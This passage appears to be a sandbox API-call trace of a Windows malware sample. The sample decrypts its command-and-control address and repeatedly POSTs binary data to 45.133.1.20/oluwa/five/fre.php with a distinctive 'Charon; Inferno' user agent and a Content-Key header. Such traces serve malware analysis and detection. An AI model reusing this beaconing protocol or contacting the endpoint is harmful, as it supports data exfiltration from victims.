returned 0x6a0000 [0174.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0174.719] send (s=0x380, buf=0x6bbd20*, len=242, flags=0) returned 242 [0174.719] send (s=0x380, buf=0x6bb998*, len=159, flags=0) returned 159 [0174.720] GetProcessHeap () returned 0x6a0000 [0174.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0174.720] recv (in: s=0x380, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0174.813] GetProcessHeap () returned 0x6a0000 [0174.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0174.814] GetProcessHeap () returned 0x6a0000 [0174.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0174.814] GetProcessHeap () returned 0x6a0000 [0174.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0174.815] GetProcessHeap () returned 0x6a0000 [0174.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0174.815] closesocket (s=0x380) returned 0 [0174.815] GetProcessHeap () returned 0x6a0000 [0174.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0174.815] GetProcessHeap () returned 0x6a0000 [0174.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.816] GetProcessHeap () returned 0x6a0000 [0174.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0174.816] GetProcessHeap () returned 0x6a0000 [0174.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0174.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb68) returned 0x380 [0174.819] Sleep (dwMilliseconds=0xea60) [0174.820] GetProcessHeap () returned 0x6a0000 [0174.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0174.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0174.846] GetProcessHeap () returned 0x6a0000 [0174.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bff38 [0174.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.848] CryptImportKey (in: hProv=0x6beca0, pbData=0x6bff38, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0174.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.849] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.851] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.851] GetProcessHeap () returned 0x6a0000 [0174.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bff38 | out: hHeap=0x6a0000) returned 1 [0174.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.856] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0174.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.857] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0174.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.863] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0174.863] GetProcessHeap () returned 0x6a0000 [0174.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.865] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.866] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.867] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.868] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.868] GetProcessHeap () returned 0x6a0000 [0174.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0174.869] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0174.869] GetProcessHeap () returned 0x6a0000 [0174.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0174.869] GetProcessHeap () returned 0x6a0000 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.870] GetProcessHeap () returned 0x6a0000 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0174.870] GetProcessHeap () returned 0x6a0000 [0174.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0174.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.872] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0174.894] GetProcessHeap () returned 0x6a0000 [0174.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0174.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.896] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0174.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.900] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.901] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.901] GetProcessHeap () returned 0x6a0000 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0174.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.903] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0174.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.904] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0174.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.905] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0174.905] GetProcessHeap () returned 0x6a0000 [0174.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.908] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0174.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.909] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0174.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.973] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0174.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.974] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0174.974] GetProcessHeap () returned 0x6a0000 [0174.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0174.974] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0174.974] GetProcessHeap () returned 0x6a0000 [0174.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0174.977] socket (af=2, type=1, protocol=6) returned 0x384 [0174.978] connect (s=0x384, name=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0175.004] FreeAddrInfoW (pAddrInfo=0x6bf490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0175.004] GetProcessHeap () returned 0x6a0000 [0175.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0175.004] GetProcessHeap () returned 0x6a0000 [0175.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0175.005] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.006] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.006] GetProcessHeap () returned 0x6a0000 [0175.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0175.006] GetProcessHeap () returned 0x6a0000 [0175.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.011] GetProcessHeap () returned 0x6a0000 [0175.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0175.011] GetProcessHeap () returned 0x6a0000 [0175.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0175.012] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.013] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.013] GetProcessHeap () returned 0x6a0000 [0175.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0175.013] GetProcessHeap () returned 0x6a0000 [0175.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.013] send (s=0x384, buf=0x6bbd20*, len=242, flags=0) returned 242 [0175.014] send (s=0x384, buf=0x6bb998*, len=159, flags=0) returned 159 [0175.014] GetProcessHeap () returned 0x6a0000 [0175.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0175.014] recv (in: s=0x384, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0175.110] GetProcessHeap () returned 0x6a0000 [0175.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0175.111] GetProcessHeap () returned 0x6a0000 [0175.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0175.112] GetProcessHeap () returned 0x6a0000 [0175.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0175.112] GetProcessHeap () returned 0x6a0000 [0175.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0175.113] closesocket (s=0x384) returned 0 [0175.114] GetProcessHeap () returned 0x6a0000 [0175.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0175.114] GetProcessHeap () returned 0x6a0000 [0175.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.114] GetProcessHeap () returned 0x6a0000 [0175.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0175.115] GetProcessHeap () returned 0x6a0000 [0175.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0175.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4d0) returned 0x384 [0175.120] Sleep (dwMilliseconds=0xea60) [0175.122] GetProcessHeap () returned 0x6a0000 [0175.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0175.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0175.150] GetProcessHeap () returned 0x6a0000 [0175.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.152] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0175.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.154] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.155] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.155] GetProcessHeap () returned 0x6a0000 [0175.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.157] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0175.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.158] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0175.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.163] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0175.163] GetProcessHeap () returned 0x6a0000 [0175.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.164] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.167] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.168] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.168] GetProcessHeap () returned 0x6a0000 [0175.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0175.168] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.169] GetProcessHeap () returned 0x6a0000 [0175.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0175.169] GetProcessHeap () returned 0x6a0000 [0175.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.170] GetProcessHeap () returned 0x6a0000 [0175.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0175.170] GetProcessHeap () returned 0x6a0000 [0175.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0175.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.175] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.185] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0175.195] GetProcessHeap () returned 0x6a0000 [0175.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0175.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.206] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0175.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.207] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.208] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.208] GetProcessHeap () returned 0x6a0000 [0175.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0175.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.210] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0175.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.211] CryptDestroyKey (hKey=0x6ad020) returned 1 [0175.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.214] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0175.214] GetProcessHeap () returned 0x6a0000 [0175.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.218] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0175.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.219] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0175.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.220] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0175.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.221] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0175.221] GetProcessHeap () returned 0x6a0000 [0175.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0175.221] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf9e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0175.221] GetProcessHeap () returned 0x6a0000 [0175.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0175.221] socket (af=2, type=1, protocol=6) returned 0x388 [0175.222] connect (s=0x388, name=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0175.247] FreeAddrInfoW (pAddrInfo=0x6bf9e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0175.247] GetProcessHeap () returned 0x6a0000 [0175.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0175.247] GetProcessHeap () returned 0x6a0000 [0175.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0175.248] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.250] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.250] GetProcessHeap () returned 0x6a0000 [0175.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0175.250] GetProcessHeap () returned 0x6a0000 [0175.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.250] GetProcessHeap () returned 0x6a0000 [0175.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0175.251] GetProcessHeap () returned 0x6a0000 [0175.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0175.251] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.252] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.252] GetProcessHeap () returned 0x6a0000 [0175.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0175.252] GetProcessHeap () returned 0x6a0000 [0175.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.253] send (s=0x388, buf=0x6bbd20*, len=242, flags=0) returned 242 [0175.254] send (s=0x388, buf=0x6bb998*, len=159, flags=0) returned 159 [0175.254] GetProcessHeap () returned 0x6a0000 [0175.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0175.254] recv (in: s=0x388, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0175.325] GetProcessHeap () returned 0x6a0000 [0175.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0175.328] GetProcessHeap () returned 0x6a0000 [0175.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0175.329] GetProcessHeap () returned 